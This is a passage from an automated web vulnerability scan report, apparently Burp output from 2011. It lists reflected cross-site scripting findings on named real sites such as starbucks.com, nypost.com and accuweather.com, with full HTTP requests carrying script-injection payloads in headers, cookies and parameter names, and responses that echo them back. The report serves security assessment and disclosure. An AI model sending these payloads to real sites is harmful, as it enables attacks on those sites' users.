The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6593"style%3d"x%3aexpression(alert(1))"22e223ad474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6593"style="x:expression(alert(1))"22e223ad474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /card/set-auto-reload?c6593"style%3d"x%3aexpression(alert(1))"22e223ad474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:32:52 GMT
Connection: close
Content-Length: 36061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="https://www.starbucks.com/card/set-auto-reload?c6593"style="x:expression(alert(1))"22e223ad474=1" />
...[SNIP]...

1.937. http://medienfreunde.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca3b"><script>alert(1)</script>7db7a0d510a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 6ca3b"><script>alert(1)</script>7db7a0d510a

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:47:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-15
Content-Length: 19280

<?xml version="1.0" encoding="iso-8859-15"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="de" xmlns="http://www.w3.org/1999/x
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=6ca3b"><script>alert(1)</script>7db7a0d510a&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

1.938. http://remysharp.com/2007/01/25/jquery-tutorial-text-box-hints/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://remysharp.com
Path:   /2007/01/25/jquery-tutorial-text-box-hints/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f20a"><script>alert(1)</script>3d914677669 was submitted in the Referer HTTP header. This input was echoed as 7f20a\"><script>alert(1)</script>3d914677669 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2007/01/25/jquery-tutorial-text-box-hints/ HTTP/1.1
Host: remysharp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7f20a"><script>alert(1)</script>3d914677669

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 04:46:23 GMT
Server: Apache/1.3.37 (Unix) DAV/1.0.3 mod_gzip/1.3.26.1a PHP/5.2.3
Vary: *
X-Powered-By: PHP/5.2.3
X-Pingback: http://remysharp.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head profile="htt
...[SNIP]...
<img src="http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=9893019971&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=http://remysharp.com&utmr=http://www.google.com/search?hl=en&q=7f20a\"><script>alert(1)</script>3d914677669&utmp=/noscript&utmac=UA-1656750-1&utmcc=__utma%3D31852167.1310524236.1297140383.1297140383.1297140383.2%3B%2B__utmb%3D31852167%3B%2B__utmc%3D31852167%3B%2B__utmz%3D31852167.1297140383.2.2.utmccn%3D(di
...[SNIP]...

1.939. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.nypost.com
Path:   /homedelivery/signup.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73825"><script>alert(1)</script>0891e736ddd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homedelivery/signup.htm HTTP/1.1
Host: secure.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=73825"><script>alert(1)</script>0891e736ddd

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:26:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.0
Content-Length: 5982
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerNYPOST-SSL-POOL=184592576.47873.0000; expires=Tue, 08-Feb-2011 10:26:38 GMT; path=/

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=73825"><script>alert(1)</script>0891e736ddd" />
...[SNIP]...

1.940. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /index-radar.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3929</script><script>alert(1)</script>4ab41175fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e3929</script><script>alert(1)</script>4ab41175fa

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public
Date: Tue, 08 Feb 2011 05:30:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Thu, 10-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/
Content-Length: 64370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=e3929</script><script>alert(1)</script>4ab41175fa'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

1.941. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /maps-satellite.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab13</script><script>alert(1)</script>0fa26e46d41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3ab13</script><script>alert(1)</script>0fa26e46d41

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public
Date: Tue, 08 Feb 2011 05:30:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Thu, 10-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/
Content-Length: 63915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=3ab13</script><script>alert(1)</script>0fa26e46d41'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

1.942. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 45cf2<script>alert(1)</script>8b1f3293568 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45cf2<script>alert(1)</script>8b1f3293568

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>45cf2<script>alert(1)</script>8b1f3293568 - Google search</h4>
...[SNIP]...

1.943. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d2b4"><script>alert(1)</script>ff24fd18487 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3d2b4"><script>alert(1)</script>ff24fd18487

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=3d2b4"><script>alert(1)</script>ff24fd18487" />
...[SNIP]...

1.944. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/14/nypost/300x250/below-fold

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc83"><script>alert(1)</script>098d591dd19 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556dbc83"><script>alert(1)</script>098d591dd19; D41U=3ZZjLFmqycm2frJLZ_kZy1oQmD1O5XQTx1XkdK5tvcaDMd9HrC3OCkg; __qca=P0-46912658-1297086919048

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2319
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:08:55 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0; padding:0">


<div style="width:300px,height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556dbc83"><script>alert(1)</script>098d591dd19&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.945. http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/14/nypost/300x250/below-fold

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3f4"><script>alert(1)</script>e21638af679 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55564c3f4"><script>alert(1)</script>e21638af679; D41U=3ZZjLFmqycm2frJLZ_kZy1oQmD1O5XQTx1XkdK5tvcaDMd9HrC3OCkg; __qca=P0-46912658-1297086919048

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2319
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:09:00 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0; padding:0">


<div style="width:300px,height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d55564c3f4"><script>alert(1)</script>e21638af679&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
